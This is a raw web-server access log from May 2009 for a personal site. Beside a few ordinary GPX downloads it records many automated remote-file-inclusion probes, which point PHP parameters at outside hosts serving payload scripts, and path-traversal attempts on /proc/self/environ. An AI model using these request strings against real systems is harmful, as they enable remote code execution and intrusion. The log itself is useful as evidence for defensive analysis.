65.98.59.178 - - [05/May/2009:11:29:56 -0700] "GET /logs/index.php?str=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:29:56 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:29:57 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:29:58 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:30:05 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:30:06 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:30:06 -0700] "GET /logs/access_080123.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:30:08 -0700] "GET /logs/access_090308.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:30:08 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:30:15 -0700] "GET /logs/access_090308.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:30:19 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:30:21 -0700] "GET /logs/access_080512.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:30:35 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:30:37 -0700] "GET /logs/access_080510.log%20%20//templates/mangobery/footer.sample.php?Site_Path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:30:37 -0700] "GET /logs/access_080407.log%20%20//templates/mangobery/footer.sample.php?Site_Path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:30:47 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:30:47 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [05/May/2009:11:30:53 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
65.23.154.225 - - [05/May/2009:11:30:53 -0700] "GET /logs/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
65.23.154.225 - - [05/May/2009:11:30:53 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [05/May/2009:11:30:53 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:30:55 -0700] "GET /logs/access_090308.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:11:31:00 -0700] "GET /index.php?str=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 500 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:11:31:04 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
65.23.154.225 - - [05/May/2009:11:31:08 -0700] "GET /errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:11:31:13 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:11:31:19 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:11:31:24 -0700] "GET /logs/access_081107.log//appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:11:31:29 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:31:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:31:30 -0700] "GET /logs/access_080621.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:31:30 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:11:31:35 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:11:31:35 -0700] "GET /logs//appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:31:37 -0700] "GET /logs/access_080111.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:31:37 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:31:37 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:31:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:31:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:31:42 -0700] "GET /logs/access_080621.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:31:46 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 200 43056 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:31:47 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:31:51 -0700] "GET /logs/index.php?page=&lang=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:31:51 -0700] "GET /logs/access_080731.log/index.php?page=&lang=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:31:51 -0700] "GET /logs/access_080507.log/index.php?page=&lang=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:32:00 -0700] "GET /index.php?page=&lang=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [05/May/2009:11:32:00 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 500 292 "-" "XXXXXX" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:11:32:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:32:04 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:32:04 -0700] "GET /logs/access_080111.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:32:04 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:32:09 -0700] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:32:11 -0700] "GET /logs/access_080530.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:11:32:12 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:32:15 -0700] "GET /logs/access_080530.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:11:32:17 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:11:32:17 -0700] "GET /logs/access_090107.log//appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:11:32:26 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:32:29 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:32:29 -0700] "GET /logs/access_080507.log%20%20/index.php?page=&lang=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:32:29 -0700] "GET /logs/access_080731.log%20%20/index.php?page=&lang=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:32:30 -0700] "GET /logs///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:32:30 -0700] "GET //administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:32:30 -0700] "GET /logs/access_080313.log///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:32:32 -0700] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [05/May/2009:11:32:35 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.111.184.172 - - [05/May/2009:11:32:51 -0700] "GET /logs/access_080617.log HTTP/1.1" 200 2711267 "http://www.dmulk.com/logs/access_080617.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.111.184.172 - - [05/May/2009:11:32:56 -0700] "GET /logs/access_080618.log HTTP/1.1" 200 2424375 "http://www.dmulk.com/logs/access_080618.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:32:59 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:33:00 -0700] "GET /logs/access_080806.log//index.php?content=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:33:00 -0700] "GET /logs//index.php?content=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.23.154.225 - - [05/May/2009:11:33:06 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 - "-" "XXXXXX" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:33:09 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:33:09 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:33:09 -0700] "GET /logs/access_080621.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:33:15 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:33:18 -0700] "GET /logs/access_080530.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:33:28 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:33:31 -0700] "GET /logs/access_080111.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:33:31 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:33:42 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:33:52 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:33:53 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:33:54 -0700] "GET /logs/access_090222.log//index.php?content=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:33:55 -0700] "GET /logs/access_080111.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:33:57 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:34:01 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:34:02 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:34:03 -0700] "GET /logs/access_080111.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:34:22 -0700] "GET /index.php?content=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 200 42918 "-" "libwww-perl/5.79" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:34:25 -0700] "GET /logs//index.php?content=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:34:25 -0700] "GET /logs/access_090328.log//index.php?content=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:11:34:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:34:47 -0700] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:11:34:50 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:11:34:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:11:34:54 -0700] "GET /logs/access_080801.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:11:34:54 -0700] "GET /logs/access_080927.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:11:34:55 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:11:34:55 -0700] "GET /logs/access_080921.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:11:34:55 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:11:34:57 -0700] "GET /logs/access_080909.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:11:34:59 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:35:06 -0700] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:35:20 -0700] "GET /logs/access_090228.log//index.php?content=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:35:24 -0700] "GET /index.php?content=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 200 42918 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:35:30 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:35:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:35:30 -0700] "GET /logs/access_080621.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.17.253 - - [05/May/2009:11:35:46 -0700] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:35:48 -0700] "GET /logs/access_080530.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:36:12 -0700] "GET /logs/access_090328.log//index.php?content=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:37:08 -0700] "GET /logs/access_080621.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:16 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:16 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:16 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
